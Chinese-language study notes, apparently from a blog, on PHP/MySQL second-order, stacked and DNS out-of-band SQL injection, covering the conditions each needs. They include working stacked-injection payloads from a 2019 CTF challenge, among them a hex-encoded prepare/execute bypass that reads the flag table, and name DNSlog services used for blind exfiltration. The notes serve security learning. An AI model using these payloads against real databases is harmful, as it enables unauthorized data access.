-PHP 应用&SQL 二次注入&堆叠执行&DNS 带外&功能点&黑白盒条件

#PHP-MYSQL- 二次注入 -DEMO&74CMS
1 、 DEMO- 用户注册登录修改密码
2 、 CMS-74CMS 个人中心简历功能
黑盒思路:分析功能有添加后对数据操作的地方(功能点)
白盒思路: insert 后进入 select 或 update 的功能的代码块
注入条件:插入时有转义函数或配置,后续有利用插入的数据(遮阳前面失效 而后面修改密码就生效了)

#PHP-MYSQL- 堆叠注入 -DEMO&CTF 强网
堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条 sql 语
句,
例如 php 中的 mysqli_multi_query 函数。与之相对应的 mysqli_query() 只能执
行一条 SQL ,所以要想目标存在堆叠注入 , 在目标主机存在类似于
mysqli_multi_query() 这样的函数 , 根据数据库类型决定是否支持多条语句执行 .
1 、目标存在 sql 注入漏洞
2 、目标未对 ";" 号进行过滤
3 、目标中间层查询数据库信息时可同时执行多条 sql 语句
支持堆叠数据库: MYSQL MSSQL Postgresql 等
-2019 强网杯 - 随便注( CTF 题型)
';show databases;
';show tables;
';show columns from `1919810931114514`;
';select flag from `1919810931114514`;
';SeT
@a=0x73656c65637420666c61672066726f6d2060313931393831303933313131
3435313460;prepare execsql from @a;execute execsql;
1 、目标存在 sql 注入漏洞
2 、目标未对 ";" 号进行过滤
3 、目标中间层查询数据库信息时可同时执行多条 sql 语句
#PHP-MYSQL- 带外注入 -DEMO&DNSLOG
0. 注入条件
ROOT 高权限且支持 load_file()
有部分注入点是没有回显的,所有读取也是没回显的,采用带外

  1. 使用平台
    http://ceye.io
    http://www.dnslog.cn
相关推荐
小喻同学i3 分钟前
std::thread函数参数传递
开发语言·c++
ServBay41 分钟前
WordPress 核心漏洞 wp2shell,波及超 5 亿网站
后端·php
Ulyanov1 小时前
Python实现6-DOF刚体仿真器(下)——环境扰动与控制闭环
开发语言·python·算法·系统仿真·雷达电子对抗·导引头
分布式存储与RustFS2 小时前
RustFS Beta.10 性能解读:PUT 全面反超 MinIO,Rust 重写对象存储成了?
开发语言·后端·rust
小小的木头人2 小时前
Python 批量解析 Excel 经纬度,调用高德地图 API 获取中文地址
开发语言·python·excel
nzz_1712143 小时前
PHP程序员转型AI岗位指南:核心技能、北京就业市场与转型路径分析
开发语言·人工智能·php
Risehuxyc3 小时前
C# 将doc转换为docx
开发语言·c#·xhtml
码农阿豪3 小时前
上线前能跑,上线后挂了,三个隐性的SQL陷阱
数据库·sql
乖巧的妹子4 小时前
SQL知识点
数据库·sql·oracle
多加点辣也没关系4 小时前
JavaScript|第24章:事件循环与并发模型
开发语言·javascript·ecmascript